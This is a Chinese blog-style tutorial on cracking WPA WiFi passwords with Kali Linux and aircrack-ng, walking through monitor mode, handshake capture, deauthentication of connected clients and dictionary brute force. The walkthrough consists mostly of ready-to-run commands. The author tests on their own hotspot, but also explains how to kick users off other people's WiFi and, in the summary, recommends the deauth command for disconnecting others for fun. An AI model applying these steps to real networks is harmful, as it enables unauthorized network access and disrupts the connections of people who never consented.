wifi破解

实验准备

1、kali操作系统

2、支持监听的网卡一枚

3、手机热点(且要有人连上你的热点)


基本流程(简化版)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
##root权限下,(su root获取root权限,ctrl+d 解除root权限)

$ ifconfig ##检查网卡是否连接
$ airmon-ng start wlan0 ##设置监听模式
$ airodump-ng wlan0mon ##扫描附近wifi

##监听目标流量
$ airodump-ng --bssid <wifi的Mac地址> -c <信道号> -w <生成文件的存储路径> wlan0mon

##攻击指定客户端
$ aireplay-ng -0 <攻击次数> -a <wifi的Mac地址> -c <被攻击设备的Mac地址> wlan0mon

##暴力破解
$ aircrack-ng -w <字典路径> <生成的.cap文件路径>

aircrack-ng -w /usr/share/wordlists/rockyou.txt
-----------------------------------------------------------------

使用kali内置的无线密码字典,在 /usr/share/wordlists/rockyou.txt.gz,使用gzip -d rockyou.txt.gz进行解压
使用aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 94:D9:B3:12:6F:C0 tplink-01.cap进行暴力破解


基本流程

注:感觉看着吃力的话请前往重述处观看

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
# 查看Aircrack-ng帮助手册--------------------------------------------------
┌──(xy666㉿kali)-[~]
└─$ aircrack-ng --help

# 开启root权限------------------------------------------------------------
┌──(xy666㉿kali)-[~]
└─$ su root

# 检查网卡是否插入----------------------------------------------------------
┌──(root💀kali)-[/home/xy666]
└─# ifconfig
#注:若能看到 wlan0: 这一项则说明网卡已插好,如 **图1**
#若看不到,但网卡已插(虚拟机->可移动设备->查看网卡是否连接)
#则可试试使用 airmon-ng start wlan0 先开启监听
#再使用 ifconfig 查看网卡是否接入

# 查看网卡名----------------------------------------------------------------
┌──(root💀kali)-[/home/xy666]
└─# iwconfig
#注:ifconfig -a也可查看

# 设置监听模式--------------------------------------------------------------
┌──(root💀kali)-[/home/xy666]
└─# airmon-ng start wlan0
#注:网卡开启了监听模式之后网卡的名字就变为 wlan0mon 了,以后的所有命令中的网卡名都是叫 wlan0mon

# 扫描附近wifi-------------------------------------------------------------
┌──(root💀kali)-[/home/xy666]
└─# airodump-ng wlan0mon
# BSSID代表路由器的 MAC 地址
# PWR 代表信号的强度,数值越大代表信息越强
# CH 代表信道(注意)
# ENC代表用的加密的方式
# AUTH 代表认证的方式
# ESSID是WIFI的名字
#注:具体情况见 **图2**
#我黑的是我自己的手机热点,记住Mac地址和信道CH,之后要用到
#Mac地址:32:A6:EB:AD:73:6B
#信道:11
#注:ctrl+c 停止扫描wifi,不停止的话就会一直扫描,导致当前命令行不可用,
#但也可以新开一个命令行进行下一步操作。

# 监听目标流量--------------------------------------------------------------
┌──(root💀kali)-[~]
└─# airodump-ng --bssid 32:A6:EB:AD:73:6B -c 11 -w /home/xy666/Desktop/wifi/ wlan0mon
#–bssid:指定路由器的MAC
#-c:指定信道
#-w:指定抓去握手包的存放位置或者名字,freedom是一会抓去的握手包的名字
#注:-w 指定生成文件的生成位置
#注:若监听目标流量时出现WPA handshake: 94:D9:B3:12:6F:C0表示握手包抓取成功,如 **图3**
#注:若很久都抓不到包,可以开启一个新的命令行攻击指定用户来加快握手包的抓取,
#接下一条指令 ↓,下一条指令完成后见 **图4** ,对了,同样也是ctrl+c停止监听

# 攻击指定客户端------------------------------------------------------------
┌──(root💀kali)-[/home/xy666]
└─# aireplay-ng -0 100 -a 32:A6:EB:AD:73:6B -c C4:23:60:EC:04:AF wlan0mon
#-0 指定攻击次数,这里设置值为100
#-a 表示测试WIFI的mac地址,这里指我手机热点的mac地址(牵强的解释)
#-c 连接至该WIFI的设备的mac地址,这里指我的攻击对象的mac地址
#注:这条指令过后,被攻击者的wifi就断掉了,这时只要他重连wifi,我们就能抓取到握手包了。接上一条指令 ↑

# 暴力破解阶段-------------------------------------------------------------
#首先,新建一个字典(我用的是该方法,其他方法其自行查找别人的博客),如 **图5**
┌──(root💀kali)-[~]
└─# aircrack-ng -w /home/xy666/桌面/kali/wifi.txt /home/xy666/Desktop/wifi/-01.cap
#注:aircrack-ng -w <字典路径> <生成的.cap文件路径>
#结果如 **图6**


图1:

image-20220306135426910


图2:

image-20220306154550116


图3:

image-20220306154800805


图4:

此时生成了5个文件,但我们要用到的只有那个.cap后缀的文件

image-20220306151935605


图5:

因为只是为了体验流程,所以直接把我的热点密码写进字典里了

image-20220306152707770


图6

恭喜!得到wifi密码–xy6666666 ^_^

image-20220306153241860



参考链接:

    链接:手把手教你如何使用kali破解wifi密码(图文教程)_m0_46435741的博客-CSDN博客_kali wifi密码

    链接: 破解日记 WiFi密码跑字典暴力破解 尽可能通俗易懂的版本_m0_46192523的博客-CSDN博客_wifi跑字典

    链接:使用kali破解WIFI——Aircrack-ng_渗透测试-CSDN博客_kali 无线

    链接:Kali-WIFI攻防(二)—-无线网络分析工具Aircrack-ng - 掘金 (juejin.cn)


    链接:aircrack-ng 使用 - 知乎 (zhihu.com)



小结

学到了一条攻击指令,有事没事可以去断断别人的网玩
$ aireplay-ng -0 <攻击次数> -a <wifi的Mac地址> -c <被攻击设备的Mac地址> wlan0mon

img



重述

为了看起来不那么费劲,这里我再一步一步地对应一遍:

就用基本流程里的6步

1
2
3
4
5
6
7
8
9
10
11
12
13
14
##root权限下,(su root获取root权限,ctrl+d 解除root权限)

$ ifconfig ##检查网卡是否连接
$ airmon-ng start wlan0 ##设置监听模式
$ airodump-ng wlan0mon ##扫描附近wifi

##监听目标流量
$ airodump-ng --bssid <wifi的Mac地址> -c <信道号> -w <生成文件的存储路径> wlan0mon

##攻击指定客户端
$ aireplay-ng -0 <攻击次数> -a <wifi的Mac地址> -c <被攻击设备的Mac地址> wlan0mon

##暴力破解
$ aircrack-ng -w <字典路径> <生成的.cap文件路径>

1
2
$ ifconfig                   ##检查网卡是否连接
$ su root ##开启root权限

可以看到,此时网卡名为wlan0

image-20220306161810476


1
$ airmon-ng  start wlan0     ##设置监听模式

设置监听过后,可以看到我们的网卡名变成了wlan0mon

image-20220306162422299


1
$ airodump-ng  wlan0mon      ##扫描附近wifi

不知道为什么中间空了一大段

image-20220306162657603

Mac:32:A6:EB:AD:73:6B 信道:11

image-20220306162816968

注:ctrl+c 停止扫描


1
2
##监听目标流量
$ airodump-ng --bssid <wifi的Mac地址> -c <信道号> -w <生成文件的存储路径> wlan0mon

检测到三个连接我热点的设备

image-20220306163144205

实际上也的确有三个设备连接着我的热点

image-20220306163230059

此时叫一个小伙伴断网重连我的热点,便抓取到了握手数据包,如下:

image-20220306163446243

当然,如果是破解别人的wifi,可以利用下一条指令踢掉一个WiFi用户,等被踢用户重新连接wifi的时候我们便可以抓取到握手数据包。

ctrl+c 停止监听:

image-20220306163844323


1
2
##攻击指定客户端
$ aireplay-ng -0 <攻击次数> -a <wifi的Mac地址> -c <被攻击设备的Mac地址> wlan0mon

这里就不列图了。1、懒;2、还是因为懒


1
2
##暴力破解
$ aircrack-ng -w <字典路径> <生成的.cap文件路径>

首先,查看文件是否生成(生成了):

image-20220306164103787

那么,开始破解(得到密码:xy6666666):

image-20220306164410424